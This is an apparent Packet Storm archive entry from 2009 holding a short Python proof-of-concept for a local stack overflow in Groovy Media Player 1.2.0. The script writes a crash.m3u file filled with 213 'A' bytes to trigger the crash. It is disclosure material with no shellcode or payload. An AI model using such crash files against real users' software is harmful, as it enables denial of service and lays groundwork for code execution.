Lucene search

K
packetstormOptix hackerPACKETSTORM:80088
HistoryAug 06, 2009 - 12:00 a.m.

Groovy Media Player 1.2.0 Overflow

2009-08-0600:00:00
optix hacker
packetstormsecurity.com
12
`#!/usr/bin/python  
print "Groovy Media Player 1.2.0 (.m3u) local stack overlow POC"  
print " finded by : opt!x hacker <[email protected]> "  
print "download: http://www.bestwebsharing.com/downloads/groovy-media-player-setup.exe "  
junk = "\x41"*213  
file=open("crash.m3u","w")  
file.write(junk)  
file.close()  
  
`